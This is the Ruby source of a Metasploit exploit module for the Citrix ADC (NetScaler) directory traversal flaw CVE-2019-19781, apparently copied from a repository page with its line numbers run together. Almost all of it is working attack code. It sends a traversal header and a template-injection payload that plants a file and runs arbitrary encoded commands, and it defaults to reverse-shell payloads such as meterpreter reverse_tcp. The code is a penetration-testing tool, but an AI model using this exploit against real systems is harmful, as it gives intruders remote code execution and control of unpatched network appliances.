Path: blob/master/modules/exploits/freebsd/http/citrix_dir_traversal_rce.rb
19511 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = ExcellentRanking89prepend Msf::Exploit::Remote::AutoCheck10include Msf::Exploit::Remote::HttpClient11include Msf::Exploit::Remote::CheckModule12include Msf::Exploit::FileDropper13include Msf::Module::Deprecated1415moved_from 'exploit/linux/http/citrix_dir_traversal_rce'1617def initialize(info = {})18super(19update_info(20info,21'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE',22'Description' => %q{23This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka24NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.25},26'Author' => [27'Mikhail Klyuchnikov', # Discovery28'Project Zero India', # PoC used by this module29'TrustedSec', # PoC used by this module30'James Brytan', # PoC contributed independently31'James Smith', # PoC contributed independently32'Marisa Mack', # PoC contributed independently33'Rob Vinson', # PoC contributed independently34'Sergey Pashevkin', # PoC contributed independently35'Steven Laura', # PoC contributed independently36'mekhalleh (RAMELLA Sébastien)' # Module author (https://www.pirates.re/)37],38'References' => [39['CVE', '2019-19781'],40['EDB', '47901'],41['EDB', '47902'],42['URL', 'http://web.archive.org/web/20220608001448/https://support.citrix.com/article/CTX267027'],43['URL', 'http://web.archive.org/web/20200707202522/https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],44['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']45],46'DisclosureDate' => '2019-12-17',47'License' => MSF_LICENSE,48'Platform' => ['python', 'unix'],49'Arch' => [ARCH_PYTHON, ARCH_CMD],50'Privileged' => false,51'Targets' => [52[53'Python',54{55'Platform' => 'python',56'Arch' => ARCH_PYTHON,57'Type' => :python,58'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }59}60],61[62'Unix Command',63{64'Platform' => 'unix',65'Arch' => ARCH_CMD,66'Type' => :unix_cmd,67'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }68}69]70],71'DefaultTarget' => 0,72'DefaultOptions' => {73'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal',74'HttpClientTimeout' => 3.575},76'Notes' => {77'AKA' => ['Shitrix'],78'Stability' => [CRASH_SAFE],79'Reliability' => [REPEATABLE_SESSION],80'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]81}82)83)8485register_options([86OptString.new('TARGETURI', [true, 'Base path', '/'])87])88end8990def cmd_unix_generic?91datastore['PAYLOAD'] == 'cmd/unix/generic'92end9394def exploit95print_status("Yeeting #{datastore['PAYLOAD']} payload at #{peer}")96vprint_status("Generated payload: #{payload.encoded}")9798case target['Type']99when :python100execute_command(%(/var/python/bin/python2 -c "#{payload.encoded}"))101when :unix_cmd102if (res = execute_command(payload.encoded)) && cmd_unix_generic?103print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))104end105end106end107108def execute_command(cmd, _opts = {})109filename = rand_text_alpha(8..42)110nonce = rand_text_alpha(8..42)111112res = send_request_cgi(113'method' => 'POST',114'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),115'headers' => {116'NSC_USER' => "../../../netscaler/portal/templates/#{filename}",117'NSC_NONCE' => nonce118},119'vars_post' => {120'url' => rand_text_alpha(8..42),121'title' => "[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]"122}123)124125unless res && res.code == 200126print_error('No response to POST newbm.pl request')127return128end129130res = send_request_cgi(131'method' => 'GET',132'uri' => normalize_uri(target_uri.path, "/vpn/../vpns/portal/#{filename}.xml"),133'headers' => {134'NSC_USER' => rand_text_alpha(8..42),135'NSC_NONCE' => nonce136},137'partial' => true138)139140unless res && res.code == 200141print_warning("No response to GET #{filename}.xml request")142end143144register_files_for_cleanup(145"/netscaler/portal/templates/#{filename}.xml",146"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2"147)148149res150end151152def chr_payload(cmd)153cmd.each_char.map { |c| "chr(#{c.ord})" }.join('.')154end155156end157158159